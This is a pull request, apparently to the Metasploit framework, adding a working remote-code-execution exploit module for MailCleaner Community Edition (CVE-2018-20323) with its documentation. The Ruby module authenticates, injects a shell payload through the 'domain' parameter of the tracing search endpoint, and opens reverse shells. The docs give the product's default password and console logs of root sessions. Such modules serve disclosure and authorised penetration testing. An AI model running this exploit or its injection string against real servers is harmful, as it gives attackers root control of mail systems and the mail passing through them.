### PR TITLE
Adding Module MailCleaner Remote Code Execution Module

### DIFF
--- a/documentation/modules/exploit/linux/http/mailcleaner_exec.md
+++ b/documentation/modules/exploit/linux/http/mailcleaner_exec.md
@@ -12,15 +12,15 @@ At the time of this writing all the passwords of users such as root or admin use
 
 A successful check of the exploit will look like this:
 
-- [ ] Start `msfconsole`
-- [ ] `use use exploit/linux/http/mailcleaner`
-- [ ] Set `RHOST`
-- [ ] Set `LHOST`
-- [ ] Set `USERNAME`
-- [ ] Set `PASSWORD`
-- [ ] Run `exploit`
-- [ ] **Verify** that you are seeing ` Awesome..! Authenticated`.
-- [ ] **Verify** that you are getting `meterpreter` session.
+1. Start `msfconsole`
+2. `use use exploit/linux/http/mailcleaner`
+3. Set `RHOST`
+4. Set `LHOST`
+5. Set `USERNAME`
+6. Set `PASSWORD`
+7. Run `exploit`
+8. **Verify** that you are seeing ` Awesome..! Authenticated`.
+9. **Verify** that you are getting `meterpreter` session.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/linux/http/mailcleaner_exec.md
+++ b/documentation/modules/exploit/linux/http/mailcleaner_exec.md
@@ -1,4 +1,4 @@
-## Vulnerable Application
+## Description
 
 This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.
 

--- a/documentation/modules/exploit/linux/http/mailcleaner_exec.md
+++ b/documentation/modules/exploit/linux/http/mailcleaner_exec.md
@@ -2,6 +2,7 @@
 
 This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.
 
+### Installation
 You can download ISO file from following URL.
 [https://www.mailcleaner.org/latest-downloads/](https://www.mailcleaner.org/latest-downloads/)
 
@@ -45,4 +46,40 @@ msf5 exploit(linux/http/mailcleaner_exec) > run
 [*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.100:44975) at 2018-12-19 17:24:45 +0300
 
 meterpreter >
+```
+
+You can also use cmd payloads.
+
+```
+msf5 > use exploit/linux/http/mailcleaner_exec 
+msf5 exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100
+RHOSTS => 12.0.0.100
+msf5 exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1
+LHOST => 12.0.0.1
+msf5 exploit(linux/http/mailcleaner_exec) > set USERNAME admin
+USERNAME => admin
+msf5 exploit(linux/http/mailcleaner_exec) > set PASSWORD <password>
+msf5 exploit(linux/http/mailcleaner_exec) > set target 1
+msf5 exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse
+payload => cmd/unix/reverse
+msf5 exploit(linux/http/mailcleaner_exec) > run
+
+[*] Started reverse TCP double handler on 12.0.0.1:4444 
+[*] Performing authentication...
+[+] Awesome..! Authenticated with admin:MCPassw0rd
+[*] Exploiting command injection flaw
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo P6zixt2asYXZ29NE;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "P6zixt2asYXZ29NE\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 2 opened (12.0.0.1:4444 -> 12.0.0.100:53996) at 2018-12-20 12:09:32 +0300
+
+id
+uid=0(root) gid=1003(mailcleaner) groups=1003(mailcleaner)
 ```

--- a/documentation/modules/exploit/linux/http/mailcleaner_exec.md
+++ b/documentation/modules/exploit/linux/http/mailcleaner_exec.md
@@ -1,0 +1,48 @@
+## Vulnerable Application
+
+This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.
+
+You can download ISO file from following URL.
+[https://www.mailcleaner.org/latest-downloads/](https://www.mailcleaner.org/latest-downloads/)
+
+At the time of this writing all the passwords of users such as root or admin user was "MCPassw0rd".
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use use exploit/linux/http/mailcleaner`
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Set `USERNAME`
+- [ ] Set `PASSWORD`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing ` Awesome..! Authenticated`.
+- [ ] **Verify** that you are getting `meterpreter` session.
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/http/mailcleaner_exec 
+msf5 exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100
+RHOSTS => 12.0.0.100
+msf5 exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1
+LHOST => 12.0.0.1
+msf5 exploit(linux/http/mailcleaner_exec) > set USERNAME admin
+USERNAME => admin
+msf5 exploit(linux/http/mailcleaner_exec) > set PASSWORD <password>
+PASSWORD => qwe123
+msf5 exploit(linux/http/mailcleaner_exec) > run
+
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Performing authentication...
+[+] Awesome..! Authenticated with admin:<password>
+[*] Exploiting command injection flaw
+[*] Sending stage (53508 bytes) to 12.0.0.100
+[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.100:44974) at 2018-12-19 17:24:44 +0300
+[*] Sending stage (53508 bytes) to 12.0.0.100
+[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.100:44975) at 2018-12-19 17:24:45 +0300
+
+meterpreter >
+```

--- a/documentation/modules/exploit/linux/http/mailcleaner_exec.md
+++ b/documentation/modules/exploit/linux/http/mailcleaner_exec.md
@@ -2,7 +2,7 @@
 
 This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.
 
-### Installation
+### Vulnerable Application
 You can download ISO file from following URL.
 [https://www.mailcleaner.org/latest-downloads/](https://www.mailcleaner.org/latest-downloads/)
 

--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -25,7 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
+          ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/'],
+          ['CVE', '2018-20323']
         ],
       'DefaultOptions'  =>
         {

--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -1,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Mailcleaner Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an
+        operating system command under the context of the web server user which is root.
+
+        /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
+        operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'WfsDelay' => 5,
+          'Payload'  => 'python/meterpreter/reverse_tcp'
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [[ 'Automatic', { }]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 19 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password to login with'])
+      ]
+    )
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def auth
+    print_status('Performing authentication...')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', '/')
+    })
+
+    if res && !res.get_cookies.empty?
+      cookie = res.get_cookies
+    else
+      fail_with(Failure::Unknown, 'Did not get cookie-set header from response.')
+    end
+
+    # Performing authentication
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'admin', '/'),
+      'cookie'    => cookie,
+      'vars_post' => {
+        'username'  => username,
+        'password' => password,
+        'submit' => 'Log+in'
+      }
+    })
+
+    if res && res.code == 302
+      print_good("Awesome..! Authenticated with #{username}:#{password}")
+    else
+      fail_with(Failure::Unknown, 'Credentials are not valid.')
+    end
+
+    cookie
+  end
+
+  def exploit
+    cookie = auth
+
+    if cookie.nil?
+      fail_with(Failure::Unknown, 'Something went wrong!')
+    end
+
+    print_status('Exploiting command injection flaw')
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
+      'cookie'    => cookie,
+      'vars_post' => {
+        'search' => rand_text_alpha(5),
+        'domain' => "';$(python -c \"#{payload.encoded}\");#",
+        'submit' => 1
+      }
+    })
+
+  end
+end
+

--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -33,9 +33,29 @@ class MetasploitModule < Msf::Exploit::Remote
           'WfsDelay' => 5,
           'Payload'  => 'python/meterpreter/reverse_tcp'
         },
-      'Platform'       => ['python'],
-      'Arch'           => ARCH_PYTHON,
-      'Targets'        => [[ 'Automatic', { }]],
+      'Platform'       => ['unix'],
+      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
+      'Targets'        =>
+        [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+            }
+          ],
+          [
+            'Command payload',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+              {
+                'BadChars' => "\x26",
+              }
+            }
+          ]
+        ],
       'Privileged'     => false,
       'DisclosureDate' => "Dec 19 2018",
       'DefaultTarget'  => 0
@@ -103,13 +123,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Exploiting command injection flaw')
 
+    if target['Arch'] == ARCH_PYTHON
+      cmd = "';$(python -c \"#{payload.encoded}\");#"
+    else
+      cmd = "';#{payload.encoded};#"
+    end
+
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
       'cookie'    => cookie,
       'vars_post' => {
         'search' => rand_text_alpha(5),
-        'domain' => "';$(python -c \"#{payload.encoded}\");#",
+        'domain' => cmd,
         'submit' => 1
       }
     })

--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -64,19 +64,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'admin', '/')
+      'uri' => normalize_uri(target_uri.path, 'admin/')
     })
 
     if res && !res.get_cookies.empty?
       cookie = res.get_cookies
     else
-      fail_with(Failure::Unknown, 'Did not get cookie-set header from response.')
+      fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.')
     end
 
     # Performing authentication
     res = send_request_cgi({
       'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, 'admin', '/'),
+      'uri'       => normalize_uri(target_uri.path, 'admin/'),
       'cookie'    => cookie,
       'vars_post' => {
         'username'  => username,
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 302
       print_good("Awesome..! Authenticated with #{username}:#{password}")
     else
-      fail_with(Failure::Unknown, 'Credentials are not valid.')
+      fail_with(Failure::NoAccess, 'Credentials are not valid.')
     end
 
     cookie
@@ -116,4 +116,3 @@ class MetasploitModule < Msf::Exploit::Remote
 
   end
 end
-

--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'WfsDelay' => 5,
           'Payload'  => 'python/meterpreter/reverse_tcp'
         },
-      'Platform'       => ['unix'],
+      'Platform'       => ['python', 'unix'],
       'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
       'Targets'        =>
         [

--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -32,28 +32,24 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'SSL' => true,
           'WfsDelay' => 5,
-          'Payload'  => 'python/meterpreter/reverse_tcp'
         },
       'Platform'       => ['python', 'unix'],
       'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
       'Targets'        =>
         [
-          [
-            'Python payload',
+          ['Python payload',
             {
               'Platform' => 'python',
               'Arch' => ARCH_PYTHON,
+              'DefaultOptions' => {'PAYLOAD'  => 'python/meterpreter/reverse_tcp'}
             }
           ],
-          [
-            'Command payload',
+          ['Command payload',
             {
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
-              'Payload' =>
-              {
-                'BadChars' => "\x26",
-              }
+              'Payload' => {'BadChars' => "\x26"},
+              'DefaultOptions' => {'PAYLOAD'  => 'cmd/unix/reverse_netcat'}
             }
           ]
         ],


### PR DESCRIPTION
Hi fellas 🎉

This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use use exploit/linux/http/mailcleaner`
- [x] Set `RHOST`
- [x] Set `LHOST`
- [x] Set `USERNAME`
- [x] Set `PASSWORD`
- [x] Run `exploit`
- [x] **Verify** that you are seeing ` Awesome..! Authenticated`.
- [x] **Verify** that you are getting `meterpreter` session.

**Technical Details and MSF Module in Asciinema**
[https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/](https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/)